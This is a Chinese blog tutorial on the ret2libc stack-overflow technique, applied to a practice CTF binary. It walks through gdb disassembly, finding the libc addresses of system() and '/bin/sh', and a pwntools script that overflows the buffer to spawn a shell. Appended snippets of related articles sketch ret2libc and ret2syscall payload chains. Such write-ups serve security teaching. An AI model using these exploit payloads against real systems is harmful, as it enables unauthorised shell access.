ROP之ret2libc

最新推荐文章于 2024-06-18 17:37:59 发布
最新推荐文章于 2024-06-18 17:37:59 发布
阅读量1.8k 收藏 4
点赞数 1
CC 4.0 BY-SA版权
分类专栏: 二进制安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_41725312/article/details/90748436
本文详细介绍了ROP(Return-Oriented Programming)中的ret2libc技术,通过修改返回地址,利用程序或系统中的函数(如system())来执行特定操作。文章提供了具体的payload结构示例,展示了如何在Linux环境下通过gdb调试,定位system函数和/bin/sh的地址,最终构造溢出以实现shell的获取。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

ROP之ret2libc

修改返回地址,让其指向内存中已有的某个函数

当函数调用栈的没有执行权限时,就不能执行我们自己写入的shellcode,就利用程序里或系统里的函数,libc动态链接库中通常就有需要的函数,如system()

payload结构

  • 通过溢出覆盖返回地址(相当于call system)

    padding + system address

  • 调用system时的返回地址,可以随便填

    padding+ system address + padding2

  • system的参数**/bin/sh**

    padding+ system address + padding2+/bin/sh address

实例

直接下载

攻防世界pwn-level2

自己编译

一步一步学 ROP 之 Linux_x86 篇 - 阿里聚安全 - SegmentFault 思否

mark

可以看到NX开启即No-eXecute(不可执行),也叫DEP

如果是64位的系统需要安装32位的运行环境

Linux(Ubuntu Kali)64位安装32位运行环境和编译环境 – Unitary-orz

然后用gdb调试,是一个简单输入后打印

(gdb) r
Starting program: /root/Desktop/level2 
[Detaching after fork from child process 4649]
Input:
1234
[Detaching after fork from child process 4650]
Hello World!
[Inferior 1 (process 4645) exited normally]

查看main

(gdb) disass main
Dump of assembler code for function main:
   0x08048480 <+0>:	lea    0x4(%esp),%ecx
   0x08048484 <+4>:	and    $0xfffffff0,%esp
   0x08048487 <+7>:	pushl  -0x4(%ecx)
   0x0804848a <+10>:	push   %ebp
   0x0804848b <+11>:	mov    %esp,%ebp
   0x0804848d <+13>:	push   %ecx
   0x0804848e <+14>:	sub    $0x4,%esp
   0x08048491 <+17>:	call   0x804844b <vulnerable_function>
   0x08048496 <+22>:	sub    $0xc,%esp
   0x08048499 <+25>:	push   $0x804854c
   0x0804849e <+30>:	call   0x8048320 <system@plt>
   0x080484a3 <+35>:	add    $0x10,%esp
   0x080484a6 <+38>:	mov    $0x0,%eax
   0x080484ab <+43>:	mov    -0x4(%ebp),%ecx
   0x080484ae <+46>:	leave  
   0x080484af <+47>:	lea    -0x4(%ecx),%esp
   0x080484b2 <+50>:	ret    
End of assembler dump.

跟进call 0x804844b <vulnerable_function>

(gdb) disass vulnerable_function 
Dump of assembler code for function vulnerable_function:
   0x0804844b <+0>:	push   %ebp
   0x0804844c <+1>:	mov    %esp,%ebp
   0x0804844e <+3>:	sub    $0x88,%esp
   0x08048454 <+9>:	sub    $0xc,%esp
   0x08048457 <+12>:	push   $0x8048540
   0x0804845c <+17>:	call   0x8048320 <system@plt>
   0x08048461 <+22>:	add    $0x10,%esp
   0x08048464 <+25>:	sub    $0x4,%esp
   0x08048467 <+28>:	push   $0x100
   0x0804846c <+33>:	lea    -0x88(%ebp),%eax
   0x08048472 <+39>:	push   %eax
   0x08048473 <+40>:	push   $0x0
   0x08048475 <+42>:	call   0x8048310 <read@plt>
   0x0804847a <+47>:	add    $0x10,%esp
   0x0804847d <+50>:	nop
   0x0804847e <+51>:	leave  
   0x0804847f <+52>:	ret    
End of assembler dump.

发现漏洞点read()函数,想办法进行利用

我们利用libc库中的内容,来执行system("bin/sh")

下断点在main函数

(gdb) b main
Breakpoint 1 at 0x804848e
(gdb) r
Starting program: /root/Desktop/level2 

Breakpoint 1, 0x0804848e in main ()
(gdb) info r
eax            0xf7f9adc8          -134631992
ecx            0xffffd390          -11376
edx            0xffffd3b4          -11340
ebx            0x0                 0
esp            0xffffd374          0xffffd374
ebp            0xffffd378          0xffffd378
esi            0xf7f99000          -134639616
edi            0xf7f99000          -134639616
eip            0x804848e           0x804848e <main+14>
eflags         0x282               [ SF IF ]
cs             0x23                35
ss             0x2b                43
ds             0x2b                43
es             0x2b                43
fs             0x0                 0
gs             0x63                99

查看映射地址空间

(gdb) info proc mappings 
process 4800
Mapped address spaces:

	Start Addr   End Addr       Size     Offset objfile
	 0x8048000  0x8049000     0x1000        0x0 /root/Desktop/level2
	 0x8049000  0x804a000     0x1000        0x0 /root/Desktop/level2
	 0x804a000  0x804b000     0x1000     0x1000 /root/Desktop/level2
	0xf7dbf000 0xf7dd8000    0x19000        0x0 /lib32/libc-2.28.so
	0xf7dd8000 0xf7f26000   0x14e000    0x19000 /lib32/libc-2.28.so
[...]

可以看到libc.so在内存中的起始位置为0xf7dbf000

现在来找system()"/bin/sh"

通过gdb查找

我们打印system地址和查找"/bin/sh"

(gdb) find 0xf7dbf000,+9999999,"/bin/sh"
0xf7f3daaa
warning: Unable to access 16000 bytes of target memory at 0xf7f9b6b2, halting search.
1 pattern found.
(gdb) p system
$2 = {<text variable, no debug info>} 0xf7dfd9e0 <system>
(gdb) x/s 0xf7f3daaa #字符串形式查看
0xf7f3daaa:	"/bin/sh"
(gdb) x/i 0xf7dfd9e0  #指令形式查看
0xf7dfd9e0 <system>:call   0xf7ef6b2d

system0xf7dfd9e0

"/bin/sh"0xf7f3daaa


通过string和readelf查找

有时gdb查找出来的有问题

readelf

-s --syms              Display the symbol table

string

-t --radix={o,d,x}        Print the location of the string in base 8, 10 or 16

$ string -tx #使用16进制表示字符串位置

通过上面查出的lib.so的路径/lib32/libc-2.28.so来查找

函数地址

$ readelf -s /lib32/libc-2.28.so | grep system
   257: 0012a2c0   102 FUNC    GLOBAL DEFAULT   13 svcerr_systemerr@@GLIBC_2.0
   658: 0003e9e0    55 FUNC    GLOBAL DEFAULT   13 __libc_system@@GLIBC_PRIVATE
  1525: 0003e9e0    55 FUNC    WEAK   DEFAULT   13 system@@GLIBC_2.0

字符串地址

$ strings -tx /lib32/libc-2.28.so | grep "/bin/sh"
 17eaaa /bin/sh

得到的地址是偏移地址

通过上面libc.so 的地址0xf7dbf000来计算真正地址

system(): 0xf7dfd9e0 =0xf7dbf000+0003e9e0

"/bin/sh": 0xf7f3daaa =0xf7dbf000+17eaaa


pwntool获取

这个找的是程序内的地

from pwn import *
s = process("./level2")
elf = ELF('Desktop/level2')
sys = elf.symbols['system']
sh = elf.search('/bin/sh').next()

查看缓冲区大小

来看vulnerable_function

(gdb) disass vulnerable_function 
Dump of assembler code for function vulnerable_function:
   0x0804844b <+0>:	push   %ebp
   0x0804844c <+1>:	mov    %esp,%ebp
   0x0804844e <+3>:	sub    $0x88,%esp
   0x08048454 <+9>:	sub    $0xc,%esp
   0x08048457 <+12>:	push   $0x8048540
   0x0804845c <+17>:	call   0x8048320 <system@plt>
   0x08048461 <+22>:	add    $0x10,%esp
   0x08048464 <+25>:	sub    $0x4,%esp
   0x08048467 <+28>:	push   $0x100
   0x0804846c <+33>:	lea    -0x88(%ebp),%eax
   0x08048472 <+39>:	push   %eax
   0x08048473 <+40>:	push   $0x0
   0x08048475 <+42>:	call   0x8048310 <read@plt>
   0x0804847a <+47>:	add    $0x10,%esp
   0x0804847d <+50>:	nop
   0x0804847e <+51>:	leave  
   0x0804847f <+52>:	ret    
End of assembler dump.

通过sub $0x88,%esp看出缓冲区大小为0x88,然后加上ebp的地址就是覆盖返回地址,因为是32位所以加4

exp

padding+ system address + padding2+/bin/sh address

from pwn import *

s.process(./level2)
sys = 0xf7dfd9e0
sh = 0xf7f3daaa

payload = 'a'*(0x88+4) + p32(sys) + p32(0x12345678) + p32(sh)
s.recvuntil(':')
s.sendline(payload)
s.interactive()

参考

(26) Doing ret2libc with a Buffer Overflow because of restricted return pointer - bin 0x0F - YouTube

手把手教你栈溢出从入门到放弃(上) - 知乎

ret2libc2
m0_49959202的博客
08-06 270
文章目录ret2libc21.程序分析2.栈帧构造2.1 第一种构造方式2.2 第二种构造方式3.exp编写 ret2libc2 当前的ret2libc2:有system,无”\bin\sh“ 1.程序分析 找个题和ret2libc1差不多,区别在于程序里面没有现成的"/bin/sh"字符串。 首先checksec一下: file一下: [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ss8LRj6L-1628251397723)(https://i.loli.net/2
ROPRet2libc漏洞
qq_67812668的博客
08-12 1131
ROP全称为Return-oriented Programming(返回导向式编程)是一种新型的基于代码复用技术的攻击,攻击者从已有的库或可执行文件中提取指令片段,构建恶意代码。 ROP攻击同缓冲区溢出攻击,格式化字符串漏洞攻击不同,是一种全新的攻击方式,它利用代码复用技术。
ropret2libc
温和的跳跃
02-04 369
发现很久没有看那些理论还忘记了。理论还是有用得看看的。 ROP例子还是https://www.zhihu.com/search?type=content&q=x86%20ROP这个 我回顾一下ret2libc (本身就不熟悉 : ret2libc 全称是returnlibc.so 意思是跳转到libc.so这里 .so结尾在linux是代表动态链接库 里面包含很多函数,当程序运行到需要链接的地方就会加载进来。 为什么要使用这种办法呢,当程序开启DEP(data execute preve..
基本ROPret2libc2
至臻求学,胸怀云月
02-14 3834
原理 ret2libc即控制函数执行libc中的函数,通常是返回至某个函数plt表处或者函数的具体位置(即函数对应的got表项的内容),一般情况下我们选择执行system("/bin/sh"),故而我们需要知道system函数的地址 过程 下载地址:url checksec IDA分析 gets函数 system函数 经计算gets字符串和ebp的偏移为108,这里不进行赘述 查找bin/s...
ROP-Ret2Libc概述和利用
fanghuapyk的博客
03-19 1657
ret2libc简介 ret2libc就是控制函数的执行libc中的函数,通常是返回至某个函数的 plt 处或者函数的具体位置 (即函数对应的 got 表项的内容)。一般情况下,我们会选择执行 system("/bin/sh"),因此我们通常需要找到 system 函数的地址 ret2libc通常可以分为下面这几类: 程序中自身就含有system函数和"/bin/sh"字符串 程序中自身就有system函数,但是没有"/bin/sh"字符串 程序中自身就没有system函数和"/bin/sh"字符串,但给
[PWN][高级篇]ROP-ret2libc-32/64位实例 (共四个)
网络安全知识分享
03-28 5788
ROP-ret2libc-32实例 32位思路: 1、想办法调用execve("/bin/sh",null,null) 2、传入字符串/bin///sh 3、体统调用execve eax = 11 ebx = bin sh_addr ecx = 0 edx = 0 int 0x80 实例代码如下: 接下来我们检查保护 我们看到是有NX保护,没有canary和pie保护,我们使用ROP进行绕过。关键在于如何获取system 和 /bin/sh。 objdump -d -j .plt
pwn学习-ret2libc1
Sa1nZen的博客
06-02 381
pwn学习-ret2libc1
pwn学习-ret2libc2
Sa1nZen的博客
06-16 285
pwn学习-ret2libc2
ROP之ret2alsolve(32位)详解
zhuo1358的博客
06-18 917
这几段的关系是这样的,通过link_map_obj定位.dynamic段,在通过偏移定位到.rel.plt段,.dynstr段,.dynsym段,这里的偏移程序会给,不用我们操心,然后再通过realoc_index来确定.rel.plt段对应的函数结构体,从而找到对应函数的got表位置,再通过(r_info
ret2libc exploit
07-07
exploit hack linux ret2libc
ret2libc2pwn 入门题
02-11
pwn 入门题
ret2libc 2
weixin_44864859的博客
05-19 375
ret2libc 2 该题目与retlibc1基本一致,只不过不再出现 /bin/sh 字符串,所以此次需要我们自己来读取字符串,所以我们需要两个 gadgets,第一个控制程序读取字符串,第二个控制程序执行 system("/bin/sh")。 这里我们和上一题构造system函数一样构造gets函数用于读入/bin/sh字符串,然后我们需要考虑读到什么地址? 一般来说在程序运行时bss段会分配很大一段空间,所以我们在此基础上随意制定一个地址就可以了。 p.sendline('a'*112 + p32(e
pwn基本ROP——ret2libc
turtlesd的博客
04-26 3133
ret2libc环境PLT表和GOT表ret2libc1原理漏洞分析使用checksec查看保护措施使用IDA32位进行调试获取偏移量payloadret2libc2原理漏洞分析checksec使用IDA进行调试payloadret2libc3原理漏洞分析checksec使用IDA调试payload 环境 retlibc1 ret2libc2 ret2libc3 PLT表和GOT表 在进行ret2libc学习之前,我们需要先了解一下PLT表与GOT表的内容。 Globle offset table(GOT)
PWN —— ret2libc2
qq_41696518的博客
07-03 358
ret2libc2
ROP-基础-ret2libc1
热门推荐
ATFWUS的博客
02-28 1万+
文件下载地址: 链接:https://pan.baidu.com/s/1DN4q7Dl5J45rIysA0DvZ5A 提取码:0wn8 0x01.分析 checksec: Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enab...
pwn学习——ret2libc2
MrTreebook的博客
11-28 1272
pwn学习——ret2libc21.攻击原理2. ret2libc2的源代码3.checksec看一下保护4.exp 1.攻击原理 通过把函数返回地址直接指向系统库中的函数(如system函数),同时构造该函数的输入参数栈,就可以达到代码执行的目的。 正常堆栈布局: ret2libc执行system的堆栈布局: 本题和ret2libc1的区别就是程序中没有自带"/bin/sh",需要自己写进去 2. ret2libc2的源代码 #include <stdio.h> #include <
ROP-基础-ret2libc2
ATFWUS的博客
02-28 1480
文件下载地址: 链接:https://pan.baidu.com/s/1Lncq6vrUNEJ7vLKvTQ_gsA 提取码:yywk 0x01.分析 checksec: Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enab...
Ret2libc
iextract的博客
04-24 716
昨晚同学问了关于ret2libc时参数布置的问题,今天在此记录 假设熟悉stack overflow Ps:ret2libc是为了对抗DEP/NX产生 栈的布置在说明ret2libc之前,栈的布置需要提前说明一下,以以下简单代码为例#include <stdio.h>int trap(int x) { int y=0; y+=x; return y; }int m
ret2libc2和ret2syscall区别
最新发布
03-23
<think>好的,我现在需要回答用户关于ret2libc和ret2syscall区别的问题。首先,我得回忆一下这两种攻击方式的基本概念,然后找出它们之间的不同点。用户提供的引用中有几个相关的资料,我需要仔细看一下这些引用内容,确保回答准确。 首先,ret2libc是一种利用程序中已有的库函数(比如system函数)的攻击方式,通常用于绕过NX保护。当程序没有提供后门函数时,攻击者可能需要泄露libc的地址,然后构造ROP链调用system函数。引用3和4提到了ret2libc的例子,比如调用system函数并传递参数如"/bin/sh"字符串的地址。 接下来是ret2syscall,这应该是指直接调用系统调用(syscall)而不是通过libc中的函数。比如在x86架构下,通过int 0x80指令,或者在x64架构下使用syscall指令来执行系统调用。这种攻击需要控制寄存器的值来传递系统调用号和参数,通常需要构造更复杂的ROP链来设置这些寄存器。 两者的主要区别在于利用的机制不同:ret2libc依赖现有的库函数,而ret2syscall直接使用系统调用。另外,ret2syscall可能不需要泄漏libc地址,但需要找到合适的gadgets来设置寄存器。而ret2libc可能需要泄漏libc基址来计算函数地址,特别是当ASLR启用时。 需要注意的是,用户提供的引用中并没有直接提到ret2syscall的具体例子,但引用2提到了栈溢出/ret2shellcode/ret2syscall/ret2libc的分类,说明ret2syscall是另一种方法。结合我的知识,ret2syscall通常涉及将返回地址指向syscall指令,并布置好寄存器参数。 另外,用户可能混淆了ret2syscall和ret2shellcode的区别。ret2shellcode是将控制流转向注入的shellcode,而ret2syscall是构造系统调用。不过根据引用中的分类,ret2syscall是独立的一种方法。 现在需要组织这些信息,分点说明两者的区别,包括原理、适用场景、利用条件以及示例。同时,根据用户提供的引用,引用3和4中的ret2libc例子可以引用作为说明,而ret2syscall可能没有直接引用,但可以结合知识进行解释。 最后,生成相关问题,可能涉及如何构造payload、如何寻找gadgets、防御措施等。确保问题与主题相关,并帮助用户进一步学习。</think>### ret2libc与ret2syscall的区别及用法比较 #### 1. **原理差异** - **ret2libc**:通过劫持程序执行流,跳转到动态链接库(如`libc.so`)中的函数(如`system`)执行。例如,构造栈帧调用`system("/bin/sh")`获取shell[^3][^4]。 - **ret2syscall**:直接触发系统调用(如`execve`),通过汇编指令(如`int 0x80`或`syscall`)实现,需控制寄存器传递参数(如`eax`存储系统调用号,`ebx`、`ecx`等存储参数)[^2]。 #### 2. **适用场景** - **ret2libc**: - 当程序开启**NX保护**(禁止执行栈上的代码)时,无法注入shellcode。 - 需要利用程序中已有的`libc`函数地址或通过泄漏`libc`基址计算目标函数地址。 - **ret2syscall**: - 当程序中存在可用的**gadget链**(如`pop eax; ret`)时。 - 需要直接调用系统调用且无需依赖`libc`函数(如绕过ASLR对`libc`的影响)。 #### 3. **利用条件对比** | 条件 | ret2libc | ret2syscall | |---------------------|-----------------------------------|----------------------------------| | **依赖库函数** | 是(如`system`、`execve`) | 否(直接调用内核接口) | | **寄存器控制** | 仅需传递参数地址(如`/bin/sh`) | 需设置多个寄存器(系统调用号+参数)| | **对抗NX保护** | 有效(不执行栈代码) | 有效 | | **对抗ASLR** | 需泄漏`libc`基址 | 可能无需泄漏(若gadget地址固定) | #### 4. **示例对比** - **ret2libc示例**(调用`system("/bin/sh")`): ```python # 构造栈帧:[溢出填充] + [system地址] + [返回地址] + [参数地址] payload = flat(['a' * 112, system_adr, 'b' * 4, binsh_adr]) ``` - **ret2syscall示例**(触发`execve("/bin/sh", 0, 0)`): ```python # 需构造gadget链设置eax=11(execve系统调用号),ebx指向"/bin/sh",ecx=0, edx=0 gadgets = [pop_eax_ret, 11, pop_ebx_ret, binsh_addr, pop_ecx_edx_ret, 0, 0, int_0x80] payload = flat(['a' * offset] + gadgets) ``` #### 5. **防御措施** - **ret2libc**:启用**ASLR**随机化`libc`基址;限制函数指针修改。 - **ret2syscall**:部署**Control Flow Integrity (CFI)** 阻止非法ROP链;减少可用gadget数量。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值